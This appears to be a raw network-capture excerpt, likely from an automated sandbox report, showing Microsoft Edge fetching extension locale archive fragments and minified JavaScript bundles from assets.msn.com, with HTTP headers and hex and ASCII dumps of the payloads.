                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: 8f 15 60 c1 98 b9 ab 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7
                                                                                                                                                                                                                                                                                    Data Ascii: `cc8*6D*<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: 3f a2 77 74 f9 39 14 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73
                                                                                                                                                                                                                                                                                    Data Ascii: ?wt9o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/mes
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:10 UTC1390INData Raw: c1 c2 b3 df 74 6f 40 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00
                                                                                                                                                                                                                                                                                    Data Ascii: to@Fi'W|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG|P_Cj*B5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6*g Ad/


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    9192.168.2.55001423.44.203.174434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:11 UTC627OUTGET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: assets.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-MD5: 2o3TH2IeNXyf9OP87xu6FA==
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Nov 2024 22:31:11 GMT
                                                                                                                                                                                                                                                                                    ETag: 0x8DD05C53565F83D
                                                                                                                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    x-ms-request-id: 64e866d1-101e-0037-3246-3988b3000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:12 GMT
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.195.36.241,b=476362431,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                    Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                    Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                    Akamai-Server-IP: 23.195.36.241
                                                                                                                                                                                                                                                                                    Akamai-Request-ID: 1c64b6bf
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                    Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.f124c317.1732223592.1c64b6bf
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC15145INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 37 65 32 37 63 63 61 36 30 32 37 62 38 64 36 36 39 37 63 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000/*! For license information please see vendors.7e27cca6027b8d6697cb.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC9443INData Raw: 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28
                                                                                                                                                                                                                                                                                    Data Ascii: ion(t,e){var n=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+e)+"})|(\\d{2}|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice(
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 75 78 2f 22 29 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 74 5b 6e 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 28 72 29 29 7b 76 61 72 20 69 3d 74 28 72 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 69 7d 72 65 74 75 72 6e 7b 7d 7d 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 6e 7d 2c 66 3d 22 52 4f 4f 54 22 2c 6c 3d 22 4e 41 4d 45 53 50 41 43 45 5f 52 4f 4f 54 22 2c 76 3d 22 43 48 49 4c 44 22 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000ux/")},a=function(t,e){return Object.keys(t).forEach((function(n){return e[n]=t[n]}))},s=function(t,e){var n=function n(r){if(e(r)){var i=t(r);return a(t,n),i}return{}};return a(t,n),n},f="ROOT",l="NAMESPACE_ROOT",v="CHILD",d=function(t){return
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC8204INData Raw: 65 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 38 7c 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 32 7c 28 6e 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 3c 3c 36 7c 28 72 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 2c 69 2b 3d 36 34 3d 3d 3d 6e 3f 64 28 65 3e 3e 31 36 26 32 35 35 29 3a 36 34 3d 3d 3d 72 3f 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 29 3a 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 29 3b 72 65 74 75 72 6e 20 69 7d 2c 4e 3d 6f 3f 74 3d 3e 61 74 6f 62 28 67 28 74 29 29 3a 63 3f 74 3d 3e 42 75 66 66 65 72 2e 66 72 6f 6d 28 74 2c 22 62 61 73 65 36 34 22 29 2e 74 6f 53 74 72 69 6e 67 28 22 62 69 6e 61 72 79 22 29 3a 4c 2c 44 3d 63 3f 74 3d 3e 70
                                                                                                                                                                                                                                                                                    Data Ascii: e=l[t.charAt(o++)]<<18|l[t.charAt(o++)]<<12|(n=l[t.charAt(o++)])<<6|(r=l[t.charAt(o++)]),i+=64===n?d(e>>16&255):64===r?d(e>>16&255,e>>8&255):d(e>>16&255,e>>8&255,255&e);return i},N=o?t=>atob(g(t)):c?t=>Buffer.from(t,"base64").toString("binary"):L,D=c?t=>p
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC2479INData Raw: 30 30 30 30 30 39 41 33 0d 0a 72 63 65 2c 45 2e 65 78 65 63 28 74 29 29 3b 72 65 74 75 72 6e 20 65 2e 6c 61 73 74 49 6e 64 65 78 3d 74 2e 6c 61 73 74 49 6e 64 65 78 2c 65 7d 2c 78 3d 6e 28 35 36 31 33 37 29 2c 5f 3d 78 2e 5a 3f 78 2e 5a 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 53 3d 5f 3f 5f 2e 76 61 6c 75 65 4f 66 3a 76 6f 69 64 20 30 3b 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 3f 4f 62 6a 65 63 74 28 53 2e 63 61 6c 6c 28 74 29 29 3a 7b 7d 7d 2c 4c 3d 6e 28 39 37 35 35 38 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d
                                                                                                                                                                                                                                                                                    Data Ascii: 000009A3rce,E.exec(t));return e.lastIndex=t.lastIndex,e},x=n(56137),_=x.Z?x.Z.prototype:void 0,S=_?_.valueOf:void 0;var T=function(t){return S?Object(S.call(t)):{}},L=n(97558);var N=function(t,e,n){var r=t.constructor;switch(e){case"[object ArrayBuffer]
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 6e 28 37 31 31 35 35 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 66 3d 2d 31 2c 6c 3d 69 2e 5a 2c 76 3d 21 30 2c 64 3d 74 2e 6c 65 6e 67 74 68 2c 70 3d 5b 5d 2c 68 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 70 3b 6e 26 26 28 65 3d 28 30 2c 75 2e 5a 29 28 65 2c 28 30 2c 63 2e 5a 29 28 6e 29 29 29 2c 73 3f 28 6c 3d 6f 2e 5a 2c 76 3d 21 31 29 3a 65 2e 6c 65 6e 67 74 68 3e 3d 32 30 30 26 26 28 6c 3d 61 2e 5a 2c 76 3d 21 31 2c 65 3d 6e 65 77 20 72 2e 5a 28 65 29 29 3b 74 3a 66 6f 72 28 3b 2b 2b 66 3c 64 3b 29 7b 76 61 72 20 67 3d 74 5b 66 5d 2c 5a 3d 6e 75 6c 6c 3d 3d 6e 3f 67 3a 6e 28 67 29 3b 69 66 28 67 3d 73 7c 7c 30 21 3d 3d 67 3f 67 3a 30 2c 76 26 26 5a 3d
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000=n(71155);e.Z=function(t,e,n,s){var f=-1,l=i.Z,v=!0,d=t.length,p=[],h=e.length;if(!d)return p;n&&(e=(0,u.Z)(e,(0,c.Z)(n))),s?(l=o.Z,v=!1):e.length>=200&&(l=a.Z,v=!1,e=new r.Z(e));t:for(;++f<d;){var g=t[f],Z=null==n?g:n(g);if(g=s||0!==g?g:0,v&&Z=
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 6e 3a 64 65 6c 65 74 65 20 74 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: n:delete t
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 5b 63 5d 29 2c 69 7d 7d 2c 38 37 33 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 30 33 32 33 29 2c 69 3d 6e 28 33 36 31 32 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 75 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 63 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 28 74 3d 4f 62 6a 65 63 74 28 74 29 2c 28 30 2c 72 2e 5a 29 28 75 28 74 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 29 29 29 7d 3a 69 2e 5a 3b 65 2e 5a 3d
                                                                                                                                                                                                                                                                                    Data Ascii: 00004000[c]),i}},87339:function(t,e,n){"use strict";var r=n(80323),i=n(3612),o=Object.prototype.propertyIsEnumerable,u=Object.getOwnPropertySymbols,c=u?function(t){return null==t?[]:(t=Object(t),(0,r.Z)(u(t),(function(e){return o.call(t,e)})))}:i.Z;e.Z=
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC12INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: ==typeof t
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC15599INData Raw: 30 30 30 30 33 43 45 33 0d 0a 7d 7d 2c 34 34 31 39 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 34 38 35 31 30 29 2c 69 3d 6e 28 31 32 35 34 35 29 2c 6f 3d 6e 28 32 35 31 39 37 29 2c 75 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2c 63 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2c 61 3d 75 2e 74 6f 53 74 72 69 6e 67 2c 73 3d 63 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 66 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 28 30 2c 6f 2e 5a 29 28 74 29 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 28 30 2c 72 2e 5a 29 28 74 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 28 30 2c 69
                                                                                                                                                                                                                                                                                    Data Ascii: 00003CE3}},44199:function(t,e,n){"use strict";var r=n(48510),i=n(12545),o=n(25197),u=Function.prototype,c=Object.prototype,a=u.toString,s=c.hasOwnProperty,f=a.call(Object);e.Z=function(t){if(!(0,o.Z)(t)||"[object Object]"!=(0,r.Z)(t))return!1;var e=(0,i


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    10192.168.2.55001623.44.203.174434408C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:11 UTC629OUTGET /bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: assets.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC1239INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                    Content-MD5: HCbv7Xblg3hSGHB1/o489Q==
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 14 Nov 2024 20:43:38 GMT
                                                                                                                                                                                                                                                                                    ETag: 0x8DD04ED0434B3A9
                                                                                                                                                                                                                                                                                    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    x-ms-request-id: 564bdfaa-f01e-0086-6351-3796a6000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                    x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                    x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                    Date: Thu, 21 Nov 2024 21:13:12 GMT
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    Akamai-Request-BC: [a=23.195.36.239,b=707689213,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                    Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                    Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                    Akamai-Server-IP: 23.195.36.239
                                                                                                                                                                                                                                                                                    Akamai-Request-ID: 2a2e7afd
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                                    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                                    Cache-Control: public, no-transform, max-age=31535892
                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Akamai-GRN: 0.ef24c317.1732223592.2a2e7afd
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC15145INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 6d 69 63 72 6f 73 6f 66 74 2e 34 38 31 33 32 65 35 34 32 37 64 65 62 39 37 31 65 65 32 38 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 6d 69 63 72 6f 73 6f 66 74 22 5d 2c 7b 36 33 31 36 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 7d 7d 29 3b 76
                                                                                                                                                                                                                                                                                    Data Ascii: 00006000/*! For license information please see microsoft.48132e5427deb971ee28.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["microsoft"],{63165:function(t,e,n){"use strict";n.d(e,{Z:function(){return A}});v
                                                                                                                                                                                                                                                                                    2024-11-21 21:13:12 UTC9443INData Raw: 36 2c 72 2e 62 24 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 6d 66 2c 6f 2e 6b 4a 2c 6f 2e 4b 6e 2c 6f 2e 6e 64 2c 72 2e 4d 46 2c 6f 2e 59 36 2c 72 2e 63 70 2c 73 2e 70 37 2c 73 2e 55 59 2c 6f 2e 6c 5f 2c 6c 2e 63 39 2c 6c 2e 49 62 2c 6f 2e 49 64 2c 6f 2e 72 57 2c 6f 2e 59 6d 2c 6f 2e 6f 38 2c 6f 2e 6c 65 2c 6f 2e 6e 72 2c 6f 2e 6d 66 2c 6f 2e 4b 6e 2c 6f 2e 4a 5f 2c 6f 2e 6b 4a 2c 6f 2e 56 5a 2c 6f 2e 48 44 2c 6f 2e 68 6a 2c 6f 2e 6a 6e 2c 6f 2e 59 36 2c 6f 2e 74 4f 2c 6f 2e 55 41 2c 6f 2e 4d 72 2c 6f 2e 58 7a 2c 6f 2e 6e 64 2c 64 2e 70 75 2c 6f 2e 46 59 2c 6f 2e 6c 5f 2c 6c 2e 49 62 2c 6f 2e 6d 36 2c 72 2e 77 31 2c 61 2e 47 57 2c 61 2e 4a 6a 2c 75 2e 70 5a 2c 75 2e 61 7a 2c 75 2e 5f 6c 2c 75 2e 43 4e 2c 75 2e 46 36 2c 61 2e 44 4f 3b 66 75 6e
